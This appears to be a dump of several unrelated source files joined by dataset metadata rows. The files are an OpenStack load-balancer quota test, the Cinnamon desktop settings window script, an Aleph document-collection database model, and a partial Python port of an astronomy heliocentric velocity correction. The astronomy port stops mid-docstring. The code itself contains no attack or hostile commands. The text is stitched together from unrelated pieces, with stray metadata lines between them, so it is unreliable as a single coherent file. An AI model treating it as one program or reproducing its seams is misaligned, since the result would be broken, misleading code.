# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.tests.unit import base
from openstack.load_balancer.v2 import quota
IDENTIFIER = 'IDENTIFIER'
EXAMPLE = {
'load_balancer': 1,
'listener': 2,
'pool': 3,
'health_monitor': 4,
'member': 5,
'project_id': 6,
}
class TestQuota(base.TestCase):
def test_basic(self):
sot = quota.Quota()
self.assertEqual('quota', sot.resource_key)
self.assertEqual('quotas', sot.resources_key)
self.assertEqual('/lbaas/quotas', sot.base_path)
self.assertFalse(sot.allow_create)
self.assertTrue(sot.allow_fetch)
self.assertTrue(sot.allow_commit)
self.assertTrue(sot.allow_delete)
self.assertTrue(sot.allow_list)
def test_make_it(self):
sot = quota.Quota(**EXAMPLE)
self.assertEqual(EXAMPLE['load_balancer'], sot.load_balancers)
self.assertEqual(EXAMPLE['listener'], sot.listeners)
self.assertEqual(EXAMPLE['pool'], sot.pools)
self.assertEqual(EXAMPLE['health_monitor'], sot.health_monitors)
self.assertEqual(EXAMPLE['member'], sot.members)
self.assertEqual(EXAMPLE['project_id'], sot.project_id)
def test_prepare_request(self):
body = {'id': 'ABCDEFGH', 'load_balancer': '12345'}
quota_obj = quota.Quota(**body)
response = quota_obj._prepare_request()
self.assertNotIn('id', response)
class TestQuotaDefault(base.TestCase):
def test_basic(self):
sot = quota.QuotaDefault()
self.assertEqual('quota', sot.resource_key)
self.assertEqual('quotas', sot.resources_key)
self.assertEqual('/lbaas/quotas/defaults', sot.base_path)
self.assertFalse(sot.allow_create)
self.assertTrue(sot.allow_fetch)
self.assertFalse(sot.allow_commit)
self.assertFalse(sot.allow_delete)
self.assertFalse(sot.allow_list)
self.assertTrue(sot.allow_retrieve)
def test_make_it(self):
sot = quota.Quota(**EXAMPLE)
self.assertEqual(EXAMPLE['load_balancer'], sot.load_balancers)
self.assertEqual(EXAMPLE['listener'], sot.listeners)
self.assertEqual(EXAMPLE['pool'], sot.pools)
self.assertEqual(EXAMPLE['health_monitor'], sot.health_monitors)
self.assertEqual(EXAMPLE['member'], sot.members)
self.assertEqual(EXAMPLE['project_id'], sot.project_id)
| gpl-3.0 | -2,897,508,562,307,050,000 | 36 | 78 | 0.669002 | false |
gastrodia/Cinnamon | files/usr/lib/cinnamon-settings/cinnamon-settings.py | 7 | 25817 | #!/usr/bin/env python2
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/usr/lib/cinnamon-settings/modules')
sys.path.append('/usr/lib/cinnamon-settings/bin')
import os
import glob
import gettext
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gio, Gtk, GObject, GdkPixbuf, GLib, Pango, Gdk, cairo
import SettingsWidgets
import capi
import time
import traceback
import locale
import urllib2
import proxygsettings
from functools import cmp_to_key
# i18n
gettext.install("cinnamon", "/usr/share/locale")
# Standard setting pages... this can be expanded to include applet dirs maybe?
mod_files = glob.glob('/usr/lib/cinnamon-settings/modules/*.py')
mod_files.sort()
if len(mod_files) == 0:
print "No settings modules found!!"
sys.exit(1)
mod_files = [x.split('/')[5].split('.')[0] for x in mod_files]
for mod_file in mod_files:
if mod_file[0:3] != "cs_":
raise Exception("Settings modules must have a prefix of 'cs_' !!")
modules = map(__import__, mod_files)
# i18n for menu item
menuName = _("System Settings")
menuComment = _("Control Center")
WIN_WIDTH = 800
WIN_HEIGHT = 600
WIN_H_PADDING = 20
MIN_LABEL_WIDTH = 16
MAX_LABEL_WIDTH = 25
MIN_PIX_WIDTH = 100
MAX_PIX_WIDTH = 160
MOUSE_BACK_BUTTON = 8
CATEGORIES = [
# Display name ID Show it? Always False to start Icon
{"label": _("Appearance"), "id": "appear", "show": False, "icon": "cs-cat-appearance"},
{"label": _("Preferences"), "id": "prefs", "show": False, "icon": "cs-cat-prefs"},
{"label": _("Hardware"), "id": "hardware", "show": False, "icon": "cs-cat-hardware"},
{"label": _("Administration"), "id": "admin", "show": False, "icon": "cs-cat-admin"}
]
CONTROL_CENTER_MODULES = [
# Label Module ID Icon Category Keywords for filter
[_("Networking"), "network", "cs-network", "hardware", _("network, wireless, wifi, ethernet, broadband, internet")],
[_("Display"), "display", "cs-display", "hardware", _("display, screen, monitor, layout, resolution, dual, lcd")],
[_("Bluetooth"), "bluetooth", "cs-bluetooth", "hardware", _("bluetooth, dongle, transfer, mobile")],
[_("Accessibility"), "universal-access", "cs-universal-access", "prefs", _("magnifier, talk, access, zoom, keys, contrast")],
[_("Sound"), "sound", "cs-sound", "hardware", _("sound, speakers, headphones, test")],
[_("Color"), "color", "cs-color", "hardware", _("color, profile, display, printer, output")],
[_("Graphics Tablet"), "wacom", "cs-tablet", "hardware", _("wacom, digitize, tablet, graphics, calibrate, stylus")]
]
STANDALONE_MODULES = [
# Label Executable Icon Category Keywords for filter
[_("Printers"), "system-config-printer", "cs-printer", "hardware", _("printers, laser, inkjet")],
[_("Firewall"), "gufw", "cs-firewall", "admin", _("firewall, block, filter, programs")],
[_("Languages"), "mintlocale", "cs-language", "prefs", _("language, install, foreign")],
[_("Login Window"), "gksu /usr/sbin/mdmsetup", "cs-login", "admin", _("login, mdm, gdm, manager, user, password, startup, switch")],
[_("Driver Manager"), "mintdrivers", "cs-drivers", "admin", _("video, driver, wifi, card, hardware, proprietary, nvidia, radeon, nouveau, fglrx")],
[_("Software Sources"), "mintsources", "cs-sources", "admin", _("ppa, repository, package, source, download")],
[_("Users and Groups"), "cinnamon-settings-users", "cs-user-accounts", "admin", _("user, users, account, accounts, group, groups, password")],
[_("Bluetooth"), "blueberry", "cs-bluetooth", "hardware", _("bluetooth, dongle, transfer, mobile")]
]
def print_timing(func):
def wrapper(*arg):
t1 = time.time()
res = func(*arg)
t2 = time.time()
print '%s took %0.3f ms' % (func.func_name, (t2-t1)*1000.0)
return res
return wrapper
def touch(fname, times=None):
with file(fname, 'a'):
os.utime(fname, times)
class MainWindow:
# Change pages
def side_view_nav(self, side_view, path, cat):
selected_items = side_view.get_selected_items()
if len(selected_items) > 0:
self.deselect(cat)
filtered_path = side_view.get_model().convert_path_to_child_path(selected_items[0])
if filtered_path is not None:
self.go_to_sidepage(cat, filtered_path)
def _on_sidepage_hide_stack(self):
self.stack_switcher.set_opacity(0)
def _on_sidepage_show_stack(self):
self.stack_switcher.set_opacity(1)
def go_to_sidepage(self, cat, path):
iterator = self.store[cat].get_iter(path)
sidePage = self.store[cat].get_value(iterator,2)
if not sidePage.is_standalone:
self.window.set_title(sidePage.name)
sidePage.build()
if sidePage.stack:
current_page = sidePage.stack.get_visible_child_name()
self.stack_switcher.set_stack(sidePage.stack)
l = sidePage.stack.get_children()
if len(l) > 0:
sidePage.stack.set_visible_child(l[0])
if sidePage.stack.get_visible():
self.stack_switcher.set_opacity(1)
else:
self.stack_switcher.set_opacity(0)
if hasattr(sidePage, "connect_proxy"):
sidePage.connect_proxy("hide_stack", self._on_sidepage_hide_stack)
sidePage.connect_proxy("show_stack", self._on_sidepage_show_stack)
else:
self.stack_switcher.set_opacity(0)
else:
self.stack_switcher.set_opacity(0)
self.main_stack.set_visible_child_name("content_box_page")
self.header_stack.set_visible_child_name("content_box")
self.current_sidepage = sidePage
width = 0
for widget in self.top_bar:
m, n = widget.get_preferred_width()
width += n
self.top_bar.set_size_request(width + 20, -1)
self.maybe_resize(sidePage)
else:
sidePage.build()
def maybe_resize(self, sidePage):
m, n = self.content_box.get_preferred_size()
# Resize horizontally if the module is wider than the window
use_width = WIN_WIDTH
if n.width > WIN_WIDTH:
use_width = n.width
# Resize vertically depending on the height requested by the module
use_height = WIN_HEIGHT
if not sidePage.size:
# No height requested, resize vertically if the module is taller than the window
if n.height > WIN_HEIGHT:
use_height = n.height + self.bar_heights + WIN_H_PADDING
#self.window.resize(use_width, n.height + self.bar_heights + WIN_H_PADDING)
elif sidePage.size > 0:
# Height hardcoded by the module
use_height = sidePage.size + self.bar_heights + WIN_H_PADDING
elif sidePage.size == -1:
# Module requested the window to fit it (i.e. shrink the window if necessary)
use_height = n.height + self.bar_heights + WIN_H_PADDING
self.window.resize(use_width, use_height)
def deselect(self, cat):
for key in self.side_view.keys():
if key is not cat:
self.side_view[key].unselect_all()
''' Create the UI '''
@print_timing
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("/usr/lib/cinnamon-settings/cinnamon-settings.ui")
self.window = self.builder.get_object("main_window")
self.top_bar = self.builder.get_object("top_bar")
self.side_view = {}
self.main_stack = self.builder.get_object("main_stack")
self.main_stack.set_transition_type(Gtk.StackTransitionType.CROSSFADE)
self.main_stack.set_transition_duration(150)
self.header_stack = self.builder.get_object("header_stack")
self.header_stack.set_transition_type(Gtk.StackTransitionType.CROSSFADE)
self.header_stack.set_transition_duration(150)
self.side_view_container = self.builder.get_object("category_box")
self.side_view_sw = self.builder.get_object("side_view_sw")
self.side_view_sw.show_all()
self.content_box = self.builder.get_object("content_box")
self.content_box_sw = self.builder.get_object("content_box_sw")
self.content_box_sw.show_all()
self.button_back = self.builder.get_object("button_back")
self.button_back.set_tooltip_text(_("Back to all settings"))
button_image = self.builder.get_object("image1")
button_image.props.icon_size = Gtk.IconSize.MENU
self.stack_switcher = self.builder.get_object("stack_switcher")
# Set stack to random thing and make opacity 0 so that the heading bar
# does not resize when switching between pages
self.stack_switcher.set_stack(self.main_stack)
m, n = self.button_back.get_preferred_width()
self.stack_switcher.set_margin_right(n)
self.search_entry = self.builder.get_object("search_box")
self.search_entry.connect("changed", self.onSearchTextChanged)
self.search_entry.connect("icon-press", self.onClearSearchBox)
self.window.connect("destroy", self.quit)
self.window.connect("key-press-event", self.on_keypress)
self.window.connect("button-press-event", self.on_buttonpress)
self.window.show()
self.builder.connect_signals(self)
self.window.set_has_resize_grip(False)
self.unsortedSidePages = []
self.sidePages = []
self.settings = Gio.Settings.new("org.cinnamon")
self.current_cat_widget = None
self.current_sidepage = None
self.c_manager = capi.CManager()
self.content_box.c_manager = self.c_manager
self.bar_heights = 0
for module in modules:
try:
mod = module.Module(self.content_box)
if self.loadCheck(mod) and self.setParentRefs(mod):
self.unsortedSidePages.append((mod.sidePage, mod.name, mod.category))
except:
print "Failed to load module %s" % module
traceback.print_exc()
for item in CONTROL_CENTER_MODULES:
ccmodule = SettingsWidgets.CCModule(item[0], item[1], item[2], item[3], item[4], self.content_box)
if ccmodule.process(self.c_manager):
self.unsortedSidePages.append((ccmodule.sidePage, ccmodule.name, ccmodule.category))
for item in STANDALONE_MODULES:
samodule = SettingsWidgets.SAModule(item[0], item[1], item[2], item[3], item[4], self.content_box)
if samodule.process():
self.unsortedSidePages.append((samodule.sidePage, samodule.name, samodule.category))
# sort the modules alphabetically according to the current locale
sidePageNamesToSort = map(lambda m: m[0].name, self.unsortedSidePages)
sortedSidePageNames = sorted(sidePageNamesToSort, key=cmp_to_key(locale.strcoll))
for sidePageName in sortedSidePageNames:
nextSidePage = None
for trySidePage in self.unsortedSidePages:
if(trySidePage[0].name == sidePageName):
nextSidePage = trySidePage
            self.sidePages.append(nextSidePage)
# create the backing stores for the side nav-view.
sidePagesIters = {}
self.store = {}
self.storeFilter = {}
for sidepage in self.sidePages:
sp, sp_id, sp_cat = sidepage
if not self.store.has_key(sp_cat): # Label Icon sidePage Category
self.store[sidepage[2]] = Gtk.ListStore(str, str, object, str)
for category in CATEGORIES:
if category["id"] == sp_cat:
category["show"] = True
# Don't allow item names (and their translations) to be more than 30 chars long. It looks ugly and it creates huge gaps in the icon views
name = unicode(sp.name,'utf-8')
if len(name) > 30:
name = "%s..." % name[:30]
sidePagesIters[sp_id] = (self.store[sp_cat].append([name, sp.icon, sp, sp_cat]), sp_cat)
self.min_label_length = 0
self.min_pix_length = 0
for key in self.store.keys():
char, pix = self.get_label_min_width(self.store[key])
self.min_label_length = max(char, self.min_label_length)
self.min_pix_length = max(pix, self.min_pix_length)
self.storeFilter[key] = self.store[key].filter_new()
self.storeFilter[key].set_visible_func(self.filter_visible_function)
self.min_label_length += 2
self.min_pix_length += 4
self.min_label_length = max(self.min_label_length, MIN_LABEL_WIDTH)
self.min_pix_length = max(self.min_pix_length, MIN_PIX_WIDTH)
self.min_label_length = min(self.min_label_length, MAX_LABEL_WIDTH)
self.min_pix_length = min(self.min_pix_length, MAX_PIX_WIDTH)
self.displayCategories()
# set up larger components.
self.window.set_title(_("System Settings"))
self.button_back.connect('clicked', self.back_to_icon_view)
self.calculate_bar_heights()
# Select the first sidePage
if len(sys.argv) > 1 and sys.argv[1] in sidePagesIters.keys():
(iter, cat) = sidePagesIters[sys.argv[1]]
path = self.store[cat].get_path(iter)
if path:
self.go_to_sidepage(cat, path)
else:
self.search_entry.grab_focus()
else:
self.search_entry.grab_focus()
def on_keypress(self, widget, event):
grab = False
device = Gtk.get_current_event_device()
if device.get_source() == Gdk.InputSource.KEYBOARD:
grab = Gdk.Display.get_default().device_is_grabbed(device)
if not grab and event.keyval == Gdk.KEY_BackSpace and (type(self.window.get_focus()) not in
(Gtk.TreeView, Gtk.Entry, Gtk.SpinButton, Gtk.TextView)):
self.back_to_icon_view(None)
return True
return False
def on_buttonpress(self, widget, event):
if event.button == MOUSE_BACK_BUTTON:
self.back_to_icon_view(None)
return True
return False
def calculate_bar_heights(self):
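        # Measure the top bar so window resizing in maybe_resize() can account for its height.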
h = 0
m, n = self.top_bar.get_preferred_size()
h += n.height
self.bar_heights = h
def onSearchTextChanged(self, widget):
self.displayCategories()
def onClearSearchBox(self, widget, position, event):
if position == Gtk.EntryIconPosition.SECONDARY:
self.search_entry.set_text("")
def filter_visible_function(self, model, iter, user_data = None):
sidePage = model.get_value(iter, 2)
text = self.search_entry.get_text().lower()
if sidePage.name.lower().find(text) > -1 or \
sidePage.keywords.lower().find(text) > -1:
return True
else:
return False
def displayCategories(self):
widgets = self.side_view_container.get_children()
for widget in widgets:
widget.destroy()
self.first_category_done = False # This is just to prevent an extra separator showing up before the first category
for category in CATEGORIES:
if category["show"] is True:
self.prepCategory(category)
self.side_view_container.show_all()
def get_label_min_width(self, model):
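        # Return the width of the longest single word across all labels in the model, in characters and in pixels.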
min_width_chars = 0
min_width_pixels = 0
icon_view = Gtk.IconView()
iter = model.get_iter_first()
while iter != None:
string = model.get_value(iter, 0)
split_by_word = string.split(" ")
for word in split_by_word:
layout = icon_view.create_pango_layout(word)
item_width, item_height = layout.get_pixel_size()
if item_width > min_width_pixels:
min_width_pixels = item_width
if len(word) > min_width_chars:
min_width_chars = len(word)
iter = model.iter_next(iter)
return min_width_chars, min_width_pixels
def pixbuf_data_func(self, column, cell, model, iter, data=None):
wrapper = model.get_value(iter, 1)
if wrapper:
cell.set_property('surface', wrapper.surface)
def prepCategory(self, category):
self.storeFilter[category["id"]].refilter()
if not self.anyVisibleInCategory(category):
return
if self.first_category_done:
widget = Gtk.Separator.new(Gtk.Orientation.HORIZONTAL)
self.side_view_container.pack_start(widget, False, False, 10)
box = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 4)
img = Gtk.Image.new_from_icon_name(category["icon"], Gtk.IconSize.BUTTON)
box.pack_start(img, False, False, 4)
widget = Gtk.Label()
widget.set_use_markup(True)
widget.set_markup('<span size="12000">%s</span>' % category["label"])
widget.set_alignment(.5, .5)
box.pack_start(widget, False, False, 1)
self.side_view_container.pack_start(box, False, False, 0)
widget = Gtk.IconView.new_with_model(self.storeFilter[category["id"]])
area = widget.get_area()
widget.set_item_width(self.min_pix_length)
widget.set_item_padding(0)
widget.set_column_spacing(18)
widget.set_row_spacing(18)
widget.set_margin(20)
pixbuf_renderer = Gtk.CellRendererPixbuf()
text_renderer = Gtk.CellRendererText(ellipsize=Pango.EllipsizeMode.NONE, wrap_mode=Pango.WrapMode.WORD_CHAR, wrap_width=0, width_chars=self.min_label_length, alignment=Pango.Alignment.CENTER)
text_renderer.set_alignment(.5, 0)
area.pack_start(pixbuf_renderer, True, True, False)
area.pack_start(text_renderer, True, True, False)
area.add_attribute(pixbuf_renderer, "icon-name", 1)
pixbuf_renderer.set_property("stock-size", Gtk.IconSize.DIALOG)
pixbuf_renderer.set_property("follow-state", True)
area.add_attribute(text_renderer, "text", 0)
css_provider = Gtk.CssProvider()
css_provider.load_from_data("GtkIconView { \
background-color: transparent; \
} \
GtkIconView.view.cell:selected { \
background-color: @selected_bg_color; \
}")
c = widget.get_style_context()
c.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.side_view[category["id"]] = widget
self.side_view_container.pack_start(self.side_view[category["id"]], False, False, 0)
self.first_category_done = True
self.side_view[category["id"]].connect("item-activated", self.side_view_nav, category["id"])
self.side_view[category["id"]].connect("button-release-event", self.button_press, category["id"])
self.side_view[category["id"]].connect("keynav-failed", self.on_keynav_failed, category["id"])
self.side_view[category["id"]].connect("selection-changed", self.on_selection_changed, category["id"])
def bring_selection_into_view(self, iconview):
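        # Scroll the side view so that the currently selected icon is visible.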
sel = iconview.get_selected_items()
if sel:
path = sel[0]
found, rect = iconview.get_cell_rect(path, None)
cw = self.side_view_container.get_window()
cw_x, cw_y = cw.get_position()
ivw = iconview.get_window()
iv_x, iv_y = ivw.get_position()
final_y = rect.y + (rect.height / 2) + cw_y + iv_y
adj = self.side_view_sw.get_vadjustment()
page = adj.get_page_size()
current_pos = adj.get_value()
if final_y > current_pos + page:
adj.set_value(iv_y + rect.y)
elif final_y < current_pos:
adj.set_value(iv_y + rect.y)
def on_selection_changed(self, widget, category):
sel = widget.get_selected_items()
if len(sel) > 0:
self.current_cat_widget = widget
self.bring_selection_into_view(widget)
for iv in self.side_view:
if self.side_view[iv] == self.current_cat_widget:
continue
self.side_view[iv].unselect_all()
def get_cur_cat_index(self, category):
i = 0
for cat in CATEGORIES:
if category == cat["id"]:
return i
i += 1
def get_cur_column(self, iconview):
s, path, cell = iconview.get_cursor()
if path:
col = iconview.get_item_column(path)
return col
def reposition_new_cat(self, sel, iconview):
iconview.set_cursor(sel, None, False)
iconview.select_path(sel)
iconview.grab_focus()
def on_keynav_failed(self, widget, direction, category):
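        # Arrow-key navigation ran off the edge of an icon view: move focus to the closest column in the previous or next category.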
num_cats = len(CATEGORIES)
current_idx = self.get_cur_cat_index(category)
new_cat = CATEGORIES[current_idx]
ret = False
dist = 1000
sel = None
if direction == Gtk.DirectionType.DOWN and current_idx < num_cats - 1:
new_cat = CATEGORIES[current_idx + 1]
col = self.get_cur_column(widget)
new_cat_view = self.side_view[new_cat["id"]]
model = new_cat_view.get_model()
iter = model.get_iter_first()
while iter is not None:
path = model.get_path(iter)
c = new_cat_view.get_item_column(path)
d = abs(c - col)
if d < dist:
sel = path
dist = d
iter = model.iter_next(iter)
self.reposition_new_cat(sel, new_cat_view)
ret = True
elif direction == Gtk.DirectionType.UP and current_idx > 0:
new_cat = CATEGORIES[current_idx - 1]
col = self.get_cur_column(widget)
new_cat_view = self.side_view[new_cat["id"]]
model = new_cat_view.get_model()
iter = model.get_iter_first()
while iter is not None:
path = model.get_path(iter)
c = new_cat_view.get_item_column(path)
d = abs(c - col)
if d <= dist:
sel = path
dist = d
iter = model.iter_next(iter)
self.reposition_new_cat(sel, new_cat_view)
ret = True
return ret
def button_press(self, widget, event, category):
if event.button == 1:
self.side_view_nav(widget, None, category)
def anyVisibleInCategory(self, category):
id = category["id"]
iter = self.storeFilter[id].get_iter_first()
visible = False
while iter is not None:
cat = self.storeFilter[id].get_value(iter, 3)
visible = cat == category["id"]
iter = self.storeFilter[id].iter_next(iter)
return visible
def setParentRefs (self, mod):
try:
mod._setParentRef(self.window)
except AttributeError:
pass
return True
def loadCheck (self, mod):
try:
return mod._loadCheck()
except:
return True
def back_to_icon_view(self, widget):
self.window.set_title(_("System Settings"))
self.window.resize(WIN_WIDTH, WIN_HEIGHT)
children = self.content_box.get_children()
for child in children:
child.hide()
if child.get_name() == "c_box":
c_widgets = child.get_children()
for c_widget in c_widgets:
c_widget.hide()
self.main_stack.set_visible_child_name("side_view_page")
self.header_stack.set_visible_child_name("side_view")
self.search_entry.grab_focus()
self.current_sidepage = None
def quit(self, *args):
self.window.destroy()
Gtk.main_quit()
if __name__ == "__main__":
import signal
ps = proxygsettings.get_proxy_settings()
if ps:
proxy = urllib2.ProxyHandler(ps)
else:
proxy = urllib2.ProxyHandler()
urllib2.install_opener(urllib2.build_opener(proxy))
window = MainWindow()
signal.signal(signal.SIGINT, window.quit)
Gtk.main()
| gpl-2.0 | -2,137,927,399,424,171,300 | 41.743377 | 200 | 0.564318 | false |
gazeti/aleph | aleph/model/collection.py | 2 | 6250 | import logging
from datetime import datetime
from sqlalchemy import func, cast
from sqlalchemy.dialects.postgresql import ARRAY
from aleph.core import db, url_for
from aleph.model.validate import validate
from aleph.model.role import Role
from aleph.model.permission import Permission
from aleph.model.common import IdModel, make_textid
from aleph.model.common import ModelFacets, SoftDeleteModel
log = logging.getLogger(__name__)
class Collection(db.Model, IdModel, SoftDeleteModel, ModelFacets):
_schema = 'collection.json#'
label = db.Column(db.Unicode)
summary = db.Column(db.Unicode, nullable=True)
category = db.Column(db.Unicode, nullable=True)
countries = db.Column(ARRAY(db.Unicode()))
languages = db.Column(ARRAY(db.Unicode()))
foreign_id = db.Column(db.Unicode, unique=True, nullable=False)
# Managed collections are generated by API crawlers and thus UI users
# shouldn't be allowed to add entities or documents to them. They also
# don't use advanced entity extraction features for performance reasons.
managed = db.Column(db.Boolean, default=False)
# Private collections don't show up in peek queries.
private = db.Column(db.Boolean, default=False)
creator_id = db.Column(db.Integer, db.ForeignKey('role.id'), nullable=True)
creator = db.relationship(Role)
def update(self, data):
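        # Apply a validated update payload; a newly assigned creator role is also granted read/write access to the collection.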
validate(data, self._schema)
creator_id = data.get('creator_id')
if creator_id is not None and creator_id != self.creator_id:
role = Role.by_id(creator_id)
if role is not None and role.type == Role.USER:
self.creator_id = role.id
Permission.grant_collection(self.id, role, True, True)
self.label = data.get('label')
self.summary = data.get('summary', self.summary)
self.category = data.get('category', self.category)
self.managed = data.get('managed')
self.private = data.get('private')
self.countries = data.pop('countries', [])
self.touch()
def touch(self):
self.updated_at = datetime.utcnow()
db.session.add(self)
def pending_entities(self):
"""Generate a ranked list of the most commonly used pending entities.
This is used for entity review.
"""
from aleph.model.entity import Entity
from aleph.model.reference import Reference
q = db.session.query(Entity)
q = q.filter(Entity.state == Entity.STATE_PENDING)
q = q.join(Reference, Reference.entity_id == Entity.id)
q = q.filter(Entity.collection_id == self.id)
q = q.group_by(Entity)
return q.order_by(func.sum(Reference.weight).desc())
@classmethod
def by_foreign_id(cls, foreign_id, deleted=False):
if foreign_id is None:
return
q = cls.all(deleted=deleted)
return q.filter(cls.foreign_id == foreign_id).first()
@classmethod
def create(cls, data, role=None):
foreign_id = data.get('foreign_id') or make_textid()
collection = cls.by_foreign_id(foreign_id, deleted=True)
if collection is None:
collection = cls()
collection.foreign_id = foreign_id
collection.creator = role
collection.update(data)
db.session.add(collection)
db.session.flush()
if role is not None:
Permission.grant_collection(collection.id,
role, True, True)
collection.deleted_at = None
return collection
@classmethod
def find(cls, label=None, category=[], countries=[], managed=None,
collection_id=None):
q = db.session.query(cls)
q = q.filter(cls.deleted_at == None) # noqa
if label and len(label.strip()):
label = '%%%s%%' % label.strip()
q = q.filter(cls.label.ilike(label))
q = q.filter(cls.id.in_(collection_id))
if len(category):
q = q.filter(cls.category.in_(category))
if len(countries):
types = cast(countries, ARRAY(db.Unicode()))
q = q.filter(cls.countries.contains(types))
if managed is not None:
q = q.filter(cls.managed == managed)
return q
def __repr__(self):
return '<Collection(%r, %r)>' % (self.id, self.label)
def __unicode__(self):
return self.label
@property
def is_public(self):
if not hasattr(self, '_is_public'):
try:
from flask import request
self._is_public = request.authz.collection_public(self.id)
except:
self._is_public = None
return self._is_public
@property
def roles(self):
q = db.session.query(Permission.role_id)
q = q.filter(Permission.collection_id == self.id) # noqa
q = q.filter(Permission.read == True) # noqa
return [e.role_id for e in q.all()]
def get_document_count(self):
return self.documents.count()
def get_entity_count(self, state=None):
from aleph.model.entity import Entity
q = Entity.all()
q = q.filter(Entity.collection_id == self.id)
if state is not None:
q = q.filter(Entity.state == state)
return q.count()
def to_dict(self, counts=False):
data = super(Collection, self).to_dict()
data.update({
'api_url': url_for('collections_api.view', id=self.id),
'foreign_id': self.foreign_id,
'creator_id': self.creator_id,
'label': self.label,
'summary': self.summary,
'category': self.category,
'countries': self.countries,
'managed': self.managed,
'public': self.is_public
})
if counts:
# Query how many enitites and documents are in this collection.
from aleph.model.entity import Entity
data.update({
'doc_count': self.get_document_count(),
'entity_count': self.get_entity_count(Entity.STATE_ACTIVE),
'pending_count': self.get_entity_count(Entity.STATE_PENDING)
})
return data
| mit | 2,366,045,524,785,914,400 | 36.42515 | 79 | 0.60224 | false |
eteq/erikutils | erikutils/xkeckhelio.py | 1 | 23585 | #This is a direct port of x_keckhelio.pro from XIDL
from __future__ import division, print_function
from math import pi
from numpy import cos, sin
import numpy as np
def x_keckhelio(ra, dec, epoch=2000.0, jd=None, tai=None,
longitude=None, latitude=None, altitude=None, obs='keck'):
"""
`ra` and `dec` in degrees
Returns `vcorr`: "Velocity correction term, in km/s, to add to measured
radial velocity to convert it to the heliocentric frame."
but the sign seems to be backwards of what that says:
helio_shift = -1. * x_keckhelio(RA, DEC, 2000.0)
    uses baryvel and ct2lst functions from idlastro, also ported below
#NOTE: this seems to have some jitter about the IDL version at the .1 km/s level
"""
if longitude is not None and latitude is not None and altitude is not None:
print('using long/lat/alt instead of named observatory')
elif obs == 'keck':
longitude = 360. - 155.47220
latitude = 19.82656886
altitude = 4000. #meters
else:
print('Using observatory', obs)
if obs == 'vlt':
longitude = 360. - 70.40322
latitude = -24.6258
altitude = 2635. #meters
elif obs == 'mmt':
longitude = 360. - 110.88456
latitude = 31.688778
altitude = 2600. #meters
elif obs == 'lick':
longitude = 360. - 121.637222
latitude = 37.343056
altitude = 1283. #meters
else:
raise ValueError('unrecognized observatory' + obs)
if jd is None and tai is not None:
jd = 2400000.5 + tai / (24. * 3600.)
elif tai is None and jd is not None:
pass
else:
raise ValueError('Must specify either JD or TAI')
DRADEG = 180.0 / pi
# ----------
    # Compute barycentric velocity (accurate only to 1 m/s)
dvelh, dvelb = baryvel(jd, epoch)
#Project velocity toward star
vbarycen = dvelb[0]*cos(dec/DRADEG)*cos(ra/DRADEG) + \
dvelb[1]*cos(dec/DRADEG)*sin(ra/DRADEG) + dvelb[2]*sin(dec/DRADEG)
#----------
#Compute rotational velocity of observer on the Earth
#LAT is the latitude in radians.
latrad = latitude / DRADEG
#Reduction of geodetic latitude to geocentric latitude (radians).
#DLAT is in arcseconds.
dlat = -(11. * 60. + 32.743000) * sin(2. * latrad) + \
1.163300 * sin(4. * latrad) -0.002600 * sin(6. * latrad)
latrad = latrad + (dlat / 3600.) / DRADEG
#R is the radius vector from the Earth's center to the observer (meters).
#VC is the corresponding circular velocity
#(meters/sidereal day converted to km / sec).
#(sidereal day = 23.934469591229 hours (1986))
r = 6378160.0 * (0.998327073 + 0.00167643800 * cos(2. * latrad) - \
0.00000351 * cos(4. * latrad) + 0.000000008 * cos(6. * latrad)) \
+ altitude
vc = 2. * pi * (r / 1000.) / (23.934469591229 * 3600.)
#Compute the hour angle, HA, in degrees
LST = 15. * ct2lst(longitude, 'junk', jd) # convert from hours to degrees
HA = LST - ra
#Project the velocity onto the line of sight to the star.
vrotate = vc * cos(latrad) * cos(dec/DRADEG) * sin(HA/DRADEG)
return (-vbarycen + vrotate)
def ct2lst(lng, tz, jd, day=None, mon=None, year=None):
"""
# NAME:
# CT2LST
# PURPOSE:
# To convert from Local Civil Time to Local Mean Sidereal Time.
#
# CALLING SEQUENCE:
# CT2LST, Lst, Lng, Tz, Time, [Day, Mon, Year] #NOT SUPPORTED IN PYTHON PORT!
# or
# CT2LST, Lst, Lng, dummy, JD
#
# INPUTS:
# Lng - The longitude in degrees (east of Greenwich) of the place for
# which the local sidereal time is desired, scalar. The Greenwich
# mean sidereal time (GMST) can be found by setting Lng = 0.
# Tz - The time zone of the site in hours, positive East of the Greenwich
# meridian (ahead of GMT). Use this parameter to easily account
# for Daylight Savings time (e.g. -4=EDT, -5 = EST/CDT), scalar
# This parameter is not needed (and ignored) if Julian date is
# supplied. ***Note that the sign of TZ was changed in July 2008
# to match the standard definition.***
# Time or JD - If more than four parameters are specified, then this is
# the time of day of the specified date in decimal hours. If
# exactly four parameters are specified, then this is the
# Julian date of time in question, scalar or vector
#
# OPTIONAL INPUTS:
# Day - The day of the month (1-31),integer scalar or vector
# Mon - The month, in numerical format (1-12), integer scalar or vector
# Year - The 4 digit year (e.g. 2008), integer scalar or vector
#
# OUTPUTS:
# Lst The Local Sidereal Time for the date/time specified in hours.
#
# RESTRICTIONS:
# If specified, the date should be in numerical form. The year should
# appear as yyyy.
#
# PROCEDURE:
# The Julian date of the day and time is question is used to determine
# the number of days to have passed since 0 Jan 2000. This is used
# in conjunction with the GST of that date to extrapolate to the current
# GST# this is then used to get the LST. See Astronomical Algorithms
# by Jean Meeus, p. 84 (Eq. 11-4) for the constants used.
#
# EXAMPLE:
# Find the Greenwich mean sidereal time (GMST) on 2008 Jul 30 at 15:53 pm
# in Baltimore, Maryland (longitude=-76.72 degrees). The timezone is
# EDT or tz=-4
#
# IDL> CT2LST, lst, -76.72, -4,ten(15,53), 30, 07, 2008
#
# ==> lst = 11.356505 hours (= 11h 21m 23.418s)
#
# The Web site http://tycho.usno.navy.mil/sidereal.html contains more
